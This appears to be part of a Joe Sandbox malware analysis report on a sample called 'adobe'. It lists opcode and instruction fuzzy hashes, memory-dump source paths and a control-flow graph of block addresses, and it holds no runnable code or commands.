                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_67d0000_adobe.jbxd
                      Similarity
                      • API ID:
                      • String ID: PHkq
                      • API String ID: 0-902561536
                      • Opcode ID: 36cbe8c56bb1470b12b21d92bd7f2fed6beab850eb4f1977a9582a10419b0716
                      • Instruction ID: 747446046589f54837dadd4b21095631844b57b6ad0de3d0975a95c7fb3ab06c
                      • Opcode Fuzzy Hash: 36cbe8c56bb1470b12b21d92bd7f2fed6beab850eb4f1977a9582a10419b0716
                      • Instruction Fuzzy Hash: 76312630B002018FDB55AB34CA5427F7BB7AF89204F248869E502DB396EF35DD42C791

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 2353 67dda3d-67dda46 2354 67dda4e-67dda67 2353->2354 2355 67dda48 2353->2355 2356 67dda69-67dda6c 2354->2356 2355->2354 2357 67dda9f-67ddaa2 2356->2357 2358 67dda6e-67dda9a 2356->2358 2359 67ddaa4 2357->2359 2360 67ddab1-67ddab4 2357->2360 2358->2357 2365 67ddaaa-67ddaac 2359->2365 2361 67ddad7-67ddad9 2360->2361 2362 67ddab6-67ddad2 2360->2362 2363 67ddadb 2361->2363 2364 67ddae0-67ddae3 2361->2364 2362->2361 2363->2364 2364->2356 2367 67ddae5-67ddaf4 2364->2367 2365->2360 2370 67ddc79-67ddca3 2367->2370 2371 67ddafa-67ddb33 2367->2371 2374 67ddca4 2370->2374 2378 67ddb35-67ddb3f 2371->2378 2379 67ddb81-67ddba5 2371->2379 2374->2374 2383 67ddb57-67ddb7f 2378->2383 2384 67ddb41-67ddb47 2378->2384 2385 67ddbaf-67ddc73 2379->2385 2386 67ddba7 2379->2386 2383->2378 2383->2379 2387 67ddb49 2384->2387 2388 67ddb4b-67ddb4d 2384->2388 2385->2370 2385->2371 2386->2385 2387->2383 2388->2383
                      Strings
                      Memory Dump Source
                      • Source File: 00000008.00000002.4208993616.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_67d0000_adobe.jbxd
                      Similarity
                      • API ID:
                      • String ID: PHkq
                      • API String ID: 0-902561536
                      • Opcode ID: b510f8fec2d4983f6dc5f29969d76e03ffea1a2eca654f00bd90d625e476e4eb
                      • Instruction ID: 0f0c20bd28f4f6d89d4457673a5b473c590c1e009150a5a5cc20861ec066d292
                      • Opcode Fuzzy Hash: b510f8fec2d4983f6dc5f29969d76e03ffea1a2eca654f00bd90d625e476e4eb
                      • Instruction Fuzzy Hash: B8418030E00209DFDB65DF64C5846AEBBB6FF85304F148929E406E7291DB74E946CB41
                      Strings
                      Memory Dump Source
                      • Source File: 00000008.00000002.4208993616.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_67d0000_adobe.jbxd
                      Similarity
                      • API ID:
                      • String ID: PHkq
                      • API String ID: 0-902561536
                      • Opcode ID: cb01d130e7bf9c06610bfa300d2415f5fe30133df32dd1bbfe27b30c4f1df5bb
                      • Instruction ID: 72037cb345107dcb6f4d36ee8242dc0a395d6f785d017919f5904a46512cc520
                      • Opcode Fuzzy Hash: cb01d130e7bf9c06610bfa300d2415f5fe30133df32dd1bbfe27b30c4f1df5bb
                      • Instruction Fuzzy Hash: DB31F230B002058FCB55AB74CA5467E7BF7AF89204F248829E506DB396EF35DD42CB91
                      Strings
                      Memory Dump Source
                      • Source File: 00000008.00000002.4208993616.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_67d0000_adobe.jbxd
                      Similarity
                      • API ID:
                      • String ID: |
                      • API String ID: 0-2343686810
                      • Opcode ID: a2e1938d33b5f9728fa7b8ae7a84ad107573a289650e4abdf5fe75c498fca1fd
                      • Instruction ID: 6c413967566763699aaa6a69ed163fb01d0a90d1cf57b7651b103d32ea840f6a
                      • Opcode Fuzzy Hash: a2e1938d33b5f9728fa7b8ae7a84ad107573a289650e4abdf5fe75c498fca1fd
                      • Instruction Fuzzy Hash: FA115E74B102149FDB44AF78C904B6E7BF5AF4C710F108469E50AD73A4DB35A900CB84
                      Strings
                      Memory Dump Source
                      • Source File: 00000008.00000002.4208993616.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_67d0000_adobe.jbxd
                      Similarity
                      • API ID:
                      • String ID: |
                      • API String ID: 0-2343686810
                      • Opcode ID: f9c3e0e9db6b482cf0b30d610630f779ee807d581f204c3d81f93770291aaae6
                      • Instruction ID: feb6194b743e666d49e8d37cf1bf14ebf6f28c50c6090a31933e7d8476e567f2
                      • Opcode Fuzzy Hash: f9c3e0e9db6b482cf0b30d610630f779ee807d581f204c3d81f93770291aaae6
                      • Instruction Fuzzy Hash: DE116075F102109FDB549B78C905B5E77F6AF8C750F108469E91ADB3A4DB39AC00CB84
                      Memory Dump Source
                      • Source File: 00000008.00000002.4208993616.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_67d0000_adobe.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 785b1c5bb763bd5ee5d9dc44fab86033d3cb059dae49531466698aa615254e28
                      • Instruction ID: d77df68234da249c2c987e0402d66e080916a1035e9629ea92c33103362037c7
                      • Opcode Fuzzy Hash: 785b1c5bb763bd5ee5d9dc44fab86033d3cb059dae49531466698aa615254e28
                      • Instruction Fuzzy Hash: EAB1C570F001098FEF64DBA8D9947BEBBB6EB89710F254C25E405E7395CA35EC818B91
                      Memory Dump Source
                      • Source File: 00000008.00000002.4208993616.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_67d0000_adobe.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 0f7d0f6771369098d1e842918a18c90463541d1474bd8c388d1e8b4cdd0a135f
                      • Instruction ID: f280d6af967176cb9b1498561ff5cba71b39e38dcbb40885cee9cb827fbef0e6
                      • Opcode Fuzzy Hash: 0f7d0f6771369098d1e842918a18c90463541d1474bd8c388d1e8b4cdd0a135f
                      • Instruction Fuzzy Hash: 8C81BE31E00105CFDF54ABB8E9547BE77B6EB85314F208C2AE50AD7394DB398845CB81
                      Memory Dump Source
                      • Source File: 00000008.00000002.4208993616.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_67d0000_adobe.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 29a32a4522260f2f93df0aa37e6a53d8002307d9a3cea4fdbf6d25ccab89777d
                      • Instruction ID: 7335e5d6af441a4d5ae8c58431273e7f8bb1a48c33ecf20c7806c0c023cb4049
                      • Opcode Fuzzy Hash: 29a32a4522260f2f93df0aa37e6a53d8002307d9a3cea4fdbf6d25ccab89777d
                      • Instruction Fuzzy Hash: A461E2B2F001214FCF549A7DC84066EBAEBAFD4610F154439E80ADB379DE65ED0287C1
                      Memory Dump Source
                      • Source File: 00000008.00000002.4208993616.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_67d0000_adobe.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 457ff119ac60900149d79a2ca4dbbc459bc9ef1fbc4f431fafd3740982ced889
                      • Instruction ID: 8928ab84413d9f391eae3643be989592b45a1b25fcefea29d2416e7bf3535b1a
                      • Opcode Fuzzy Hash: 457ff119ac60900149d79a2ca4dbbc459bc9ef1fbc4f431fafd3740982ced889
                      • Instruction Fuzzy Hash: 4E814030B106098FDF54DFA8D6547AEB7F6AF85304F108929D40AEB358EB34EC428B91
                      Memory Dump Source
                      • Source File: 00000008.00000002.4208993616.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_67d0000_adobe.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 9d05c8a2194a45268a6d80923b3ac5151e590da3bf17cc633c338113b980eaa9
                      • Instruction ID: 0854fa2c63eb9f7a2dded18633de0b447d790a26a4260a0e62a0fa21f6b58372
                      • Opcode Fuzzy Hash: 9d05c8a2194a45268a6d80923b3ac5151e590da3bf17cc633c338113b980eaa9
                      • Instruction Fuzzy Hash: 91914C34E102198FDF60DF64C890B9DB7B1FF89310F208999D549AB295DB70AE85CF91
                      Memory Dump Source
                      • Source File: 00000008.00000002.4208993616.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_67d0000_adobe.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: e3809ef05a2df4b5be9ccc519c0ea3862eb5dfaa15b03d673686fdc9e96a5fa7
                      • Instruction ID: 63841ba70262a73aa9c88a650c867dfcb826ae9c2a7c2b51881dfc9b0f0fc42f
                      • Opcode Fuzzy Hash: e3809ef05a2df4b5be9ccc519c0ea3862eb5dfaa15b03d673686fdc9e96a5fa7
                      • Instruction Fuzzy Hash: 94811D30B106098FDF54DFA9D65466EB7F6AF85304F108829D40AEB399EF74EC428B91
                      Memory Dump Source
                      • Source File: 00000008.00000002.4208993616.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_67d0000_adobe.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 3978625192c85a83286454749d8ea1a4744855f3d57b3f28beecaf784cf01619
                      • Instruction ID: d25b27de318ce2b384912ffbaaea49f8ebd2be9428ebb73bcef4df13392de4ab
                      • Opcode Fuzzy Hash: 3978625192c85a83286454749d8ea1a4744855f3d57b3f28beecaf784cf01619
                      • Instruction Fuzzy Hash: 64912C34E106198BDF60DF68C890B9DB7B1FF89310F208999D549AB355DB70AA85CF90
                      Memory Dump Source
                      • Source File: 00000008.00000002.4208993616.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_67d0000_adobe.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: d7c22c93de51f8bfd006b3438fca3041583a8e4ab06dcb1511a22570964a432d
                      • Instruction ID: d32dd0a114782100bd1f1dae46fee893487cce9b201a5116e8e8afc5f45202e3
                      • Opcode Fuzzy Hash: d7c22c93de51f8bfd006b3438fca3041583a8e4ab06dcb1511a22570964a432d
                      • Instruction Fuzzy Hash: 30712B70E002099FDB55DBA8D984AAEB7F6FF84304F248929E106EB355DB34ED46CB50
                      Memory Dump Source
                      • Source File: 00000008.00000002.4208993616.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_67d0000_adobe.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 0c732f16c4c1aff4fddf8d863d7b6b0ec3b19e5d553de522e0dfa1de0e0fd09e
                      • Instruction ID: 2d3e1147a11f17f199703591557b889bf37400dd1a59765bb786d5364774a62e
                      • Opcode Fuzzy Hash: 0c732f16c4c1aff4fddf8d863d7b6b0ec3b19e5d553de522e0dfa1de0e0fd09e
                      • Instruction Fuzzy Hash: 28713B70A001099FDB54DFA9D980AAEBBF6FF84304F248829E106EB355DB34ED46CB50
                      Memory Dump Source
                      • Source File: 00000008.00000002.4208993616.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_67d0000_adobe.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 184de9f8fa3adeaf49d79a380152f4ee016b77c5a862ead5047fb400ce9bf026
                      • Instruction ID: 57e3ba0a61982a8f7bdd112ac16a8000d5683bd99f3a6e0c2ba4ae788fe17aef
                      • Opcode Fuzzy Hash: 184de9f8fa3adeaf49d79a380152f4ee016b77c5a862ead5047fb400ce9bf026
                      • Instruction Fuzzy Hash: 2751C634B102149FEF60666CDA5477F3A6AE7C9710F20482AE40BD77E9CA2DCC4543A2
                      Memory Dump Source
                      • Source File: 00000008.00000002.4208993616.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_67d0000_adobe.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: c5b90697a9104c936bd7b2b3fbb0a62d87d7264c42792b4896449aee9eaedb79
                      • Instruction ID: df3834f731051951db2cda37bede3d7f0c365ec530e8835a6920474633cdafc6
                      • Opcode Fuzzy Hash: c5b90697a9104c936bd7b2b3fbb0a62d87d7264c42792b4896449aee9eaedb79
                      • Instruction Fuzzy Hash: F4518434B102149FEF64666CDA5473F366AE789750F20482AE40BD77E9CA2DCC8547A2
                      Memory Dump Source
                      • Source File: 00000008.00000002.4208993616.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_67d0000_adobe.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: f3f5af850c05b7e6523cfb30a03ee692503da5b93abdb4efb3a32df8d5b274a5
                      • Instruction ID: aef621a1c3d81a96ff53177203325fe9408d6daaa5187ae96c55c14b5f2c6679
                      • Opcode Fuzzy Hash: f3f5af850c05b7e6523cfb30a03ee692503da5b93abdb4efb3a32df8d5b274a5
                      • Instruction Fuzzy Hash: 85412B71E006099BEF70CEA9D880ABFFBB6FB84310F104D2AE256D7650D731E9558B91
                      Memory Dump Source
                      • Source File: 00000008.00000002.4208993616.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_67d0000_adobe.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: ec85eb31a6bd22d312cb39eeca2622575ab13b1670a770b41526afd2c299be39
                      • Instruction ID: a87fe2b07b7a0e71a27c056d6fb299554d7e357fc1f23b25454a1afcd06329e5
                      • Opcode Fuzzy Hash: ec85eb31a6bd22d312cb39eeca2622575ab13b1670a770b41526afd2c299be39
                      • Instruction Fuzzy Hash: 96317A70E102058BDB19CF64C9946AEBBF2EF89300F10C929E916EB351DF72E946CB50
                      Memory Dump Source
                      • Source File: 00000008.00000002.4208993616.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_67d0000_adobe.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 032dfcfd53701c8ffc4e77d9a847367c995546ef590a3e868b706fc49ca1ca64
                      • Instruction ID: bd1224b01eeb67b86b296d2c24b654c0cf5f35a457e764c301a7d062873073eb
                      • Opcode Fuzzy Hash: 032dfcfd53701c8ffc4e77d9a847367c995546ef590a3e868b706fc49ca1ca64
                      • Instruction Fuzzy Hash: A6318B30E102059BCB19CF64C9946AEB7B6FF89300F10C929E916EB351DB72ED42CB50
                      Memory Dump Source
                      • Source File: 00000008.00000002.4208993616.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_67d0000_adobe.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: f89c223cc36e2aeee07609d6fd1fd8e638e5f0a3551d8e5d815096017a4b87eb
                      • Instruction ID: b4c46c8ba0487b3816d069930614655131c3be5cefd7bc947d5d91af3f0b6ff1
                      • Opcode Fuzzy Hash: f89c223cc36e2aeee07609d6fd1fd8e638e5f0a3551d8e5d815096017a4b87eb
                      • Instruction Fuzzy Hash: 6221CF76B001004FDB648AB8D9503BEB7F6EB84624F20882AD40BD7355EA29EC4287C5
                      Memory Dump Source
                      • Source File: 00000008.00000002.4208993616.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_67d0000_adobe.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: c1b3d4774ad6cd7549fa4f756ada0ff1d95718a1666b7ae1757288bc1f6bcb33
                      • Instruction ID: 867f092cc0272d8f8c13fd0e457a8f2d96c11384e3282d734755060197690c60
                      • Opcode Fuzzy Hash: c1b3d4774ad6cd7549fa4f756ada0ff1d95718a1666b7ae1757288bc1f6bcb33
                      • Instruction Fuzzy Hash: 44218E75F006159FDB40DF69D941AAEBBF1EB88320F108829E945EB794E730DD418F91
                      Memory Dump Source
                      • Source File: 00000008.00000002.4208993616.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_67d0000_adobe.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: cc29fee42ddba75a69a68e65b6c8ccd826eec92f8b45873d204459b929566895
                      • Instruction ID: 23cc420d82b7615cb8fa83500cfed7ba85549895aa02f443ebf7a6eb6fcb5393
                      • Opcode Fuzzy Hash: cc29fee42ddba75a69a68e65b6c8ccd826eec92f8b45873d204459b929566895
                      • Instruction Fuzzy Hash: 5C217A75F016199FDB40DF69DA81AAEBBF1FB48220F10842AE945EB794E730DD408B91
                      Memory Dump Source
                      • Source File: 00000008.00000002.4208993616.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_67d0000_adobe.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: b0846028db37f30ef1e9a05b0191a093a2dc1ffbf9eec7e0894d2f00ab16ad08
                      • Instruction ID: b0329ffb0b116b22b9dbd1487645130bbd8dd0b2eb4671ea8d677984df93bf12
                      • Opcode Fuzzy Hash: b0846028db37f30ef1e9a05b0191a093a2dc1ffbf9eec7e0894d2f00ab16ad08
                      • Instruction Fuzzy Hash: 41219D75F016159FDB40DF69D981AAEBBF1EB48310F10842AE905EB794E730DD418B90
                      Memory Dump Source
                      • Source File: 00000008.00000002.4197075899.0000000000FED000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FED000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_fed000_adobe.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 2f681a898827d4a218120b4fc2effc6ead438746001046fb89d09a7970a9f382
                      • Instruction ID: 1221881888123d75fb3316dcf70aaf1f7eb592de46d64a80c6d6baec82c782e4
                      • Opcode Fuzzy Hash: 2f681a898827d4a218120b4fc2effc6ead438746001046fb89d09a7970a9f382
                      • Instruction Fuzzy Hash: C021607150D3C09FC703CB24D994711BF71AB46214F29C5EBD9898F6A7C33A980ADB62
                      Memory Dump Source
                      • Source File: 00000008.00000002.4197075899.0000000000FED000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FED000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_fed000_adobe.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 9d9b76e6137e353442398c082860af6216ecaf6e5881300b69f754805ccc2db2
                      • Instruction ID: 70fe583621e5f0167dfae59d3f789cf439c351c7282fa9221a84fd996f3b6fbb
                      • Opcode Fuzzy Hash: 9d9b76e6137e353442398c082860af6216ecaf6e5881300b69f754805ccc2db2
                      • Instruction Fuzzy Hash: 39213471504284DFCB10DF15D9C0B26BBA5FB84324F28C56DDA0A4B69AC33AD847DA62
                      Memory Dump Source
                      • Source File: 00000008.00000002.4208993616.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_67d0000_adobe.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 0e6f3424d26ef2bdbc97d43dd00b786208ae853f7911394f8551275efe666242
                      • Instruction ID: 7714d432323dcb702f3e668d45691356e675411fb852e0072828b7b55752a261
                      • Opcode Fuzzy Hash: 0e6f3424d26ef2bdbc97d43dd00b786208ae853f7911394f8551275efe666242
                      • Instruction Fuzzy Hash: 8021B430F100189FDF54DB69E9546ADB7B7EF84314F24882AE505EB354EB31EC418B84
                      Memory Dump Source
                      • Source File: 00000008.00000002.4208993616.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_67d0000_adobe.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 80f52df4fa65ac28ce458a4fe0a3ce84642dc856341dc27a3d7cf01dc306fa10
                      • Instruction ID: 21bf09f2981059c3af764a74a608bda84fcf39c60eab9e2a5331eecc631e72cc
                      • Opcode Fuzzy Hash: 80f52df4fa65ac28ce458a4fe0a3ce84642dc856341dc27a3d7cf01dc306fa10
                      • Instruction Fuzzy Hash: 461125B1F142514FDBA1867CD85077E7BE6CBC6220F148D6AE44ACB351DA2ACC438385
                      Memory Dump Source
                      • Source File: 00000008.00000002.4208993616.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_67d0000_adobe.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: c1266ac46c98c43dbf54bca2f4f0bc829f2e00ce7ab69849f5685310e837a667
                      • Instruction ID: 63bac0d0b73d012f8a7e67e208c288d28f42aa6745599f74810fc0bdc6dd15b8
                      • Opcode Fuzzy Hash: c1266ac46c98c43dbf54bca2f4f0bc829f2e00ce7ab69849f5685310e837a667
                      • Instruction Fuzzy Hash: 66110835B002500FDB618ABDD950B7ABBE6DBC6620F148D6AE50AC7359D936DC024355
                      Memory Dump Source
                      • Source File: 00000008.00000002.4208993616.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_67d0000_adobe.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 292b8eca25acc621d875bcd2eedfea0fa6abb3c994835d3eb698e954a3ddffe6
                      • Instruction ID: a25cbc00837894b5e1d934364368d6772597b011f9ef70c474ffe80692f81ea8
                      • Opcode Fuzzy Hash: 292b8eca25acc621d875bcd2eedfea0fa6abb3c994835d3eb698e954a3ddffe6
                      • Instruction Fuzzy Hash: 6111A132B105288FCF549A68D8186BE77FAABC8650F108939D406E7358EE75DC018BD1
                      Memory Dump Source
                      • Source File: 00000008.00000002.4208993616.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_67d0000_adobe.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 0e59c8a3ab7b0656d8bd793f9af96458dd14752ccf5d2345ece0d59ca276d8aa
                      • Instruction ID: 379e00730d67b73278003fa01a5c06da3c6b682680b5680bf34b3254a8571c26
                      • Opcode Fuzzy Hash: 0e59c8a3ab7b0656d8bd793f9af96458dd14752ccf5d2345ece0d59ca276d8aa
                      • Instruction Fuzzy Hash: AE019E32B105285FDF54DA68DC147FE77BBAB89310F04453AE80AE7648EA759C018BE2
                      Memory Dump Source
                      • Source File: 00000008.00000002.4208993616.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_67d0000_adobe.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 8e8610b1c51f1f716bdb101017677ef200f84dc85a2f5cc7561fda53cb9023a4
                      • Instruction ID: 78b17025455e9e73d5138fbf2edf1f699457a7e4328613e1d6a94831e99f782e
                      • Opcode Fuzzy Hash: 8e8610b1c51f1f716bdb101017677ef200f84dc85a2f5cc7561fda53cb9023a4
                      • Instruction Fuzzy Hash: DD012430B106054FDB91EA79D854B3B77E2EBCA718F108C3AE40AC7344EE22EC024380
                      Memory Dump Source
                      • Source File: 00000008.00000002.4208993616.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_67d0000_adobe.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 36acb9dc40690a93b6db96fe4f5753065347603739b1b2a234d023da553d5fab
                      • Instruction ID: f758c85cea8710f26f3814747b0f1b77bfd3d68aa3052ba680ccbb8a95726411
                      • Opcode Fuzzy Hash: 36acb9dc40690a93b6db96fe4f5753065347603739b1b2a234d023da553d5fab
                      • Instruction Fuzzy Hash: BB11D3B1D01219AFCB00DF9AD884ADEFFB4FB49324F10812AE918A7340C375A544CFA5
                      Memory Dump Source
                      • Source File: 00000008.00000002.4208993616.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_67d0000_adobe.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: e5eb5a2a0084c4e9206d87d740af84c26f72830a03e55531c8e763232d668f2c
                      • Instruction ID: a8db951e9ad24834f74d277413134c45bf159829c20dc86db679e582ec4ee301
                      • Opcode Fuzzy Hash: e5eb5a2a0084c4e9206d87d740af84c26f72830a03e55531c8e763232d668f2c
                      • Instruction Fuzzy Hash: 37016235B100100BDB6499BDD954B2BB2EADBC9714F14C83AE50AC7348ED76EC024395
                      Memory Dump Source
                      • Source File: 00000008.00000002.4208993616.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_67d0000_adobe.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 8f56f2f01148ac9f5c592a797ef67a385b5db6667136291ca28b0151f7877fc6
                      • Instruction ID: 12b50086aea9deea8e44ffc3384451ebe882a4e046d2dea140dfb0c28fddad55
                      • Opcode Fuzzy Hash: 8f56f2f01148ac9f5c592a797ef67a385b5db6667136291ca28b0151f7877fc6
                      • Instruction Fuzzy Hash: 1221D0B5D00269DFCB00CF99D944ADEFBB4FB09324F10862AE918A7340C375AA54CFA5
                      Memory Dump Source
                      • Source File: 00000008.00000002.4208993616.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_67d0000_adobe.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 98485b1482fcd5f7d24e96e503e567f7129e50350d3fd41175d92099a3a7c169
                      • Instruction ID: c633baa533d3ac7b688456c7de47ab4e7afe282ba1e06b7fec341620d2f2e638
                      • Opcode Fuzzy Hash: 98485b1482fcd5f7d24e96e503e567f7129e50350d3fd41175d92099a3a7c169
                      • Instruction Fuzzy Hash: 1F01DC70B100104BDB64997DD854B3E77EADBC9A24F10883AE10BCB340EE6AEC424389
                      Memory Dump Source
                      • Source File: 00000008.00000002.4208993616.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_67d0000_adobe.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 33760550c633950f69e7fc3f42c97a91d8780489fd0f3048344b242aa685c694
                      • Instruction ID: 7329db6cad89ed396375af52fcab0ff824a4c3bdd5c66f5f40b3fc09208d7767
                      • Opcode Fuzzy Hash: 33760550c633950f69e7fc3f42c97a91d8780489fd0f3048344b242aa685c694
                      • Instruction Fuzzy Hash: AA018130B105154FDB60EA7ED955B2AB7E6EB89718F108C39E50AD7344EE26FC414784
                      Memory Dump Source
                      • Source File: 00000008.00000002.4208993616.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_67d0000_adobe.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 4a71c9734d6386dc690ae6f65b5411deb73cdad34fb71851986b673a23fd4949
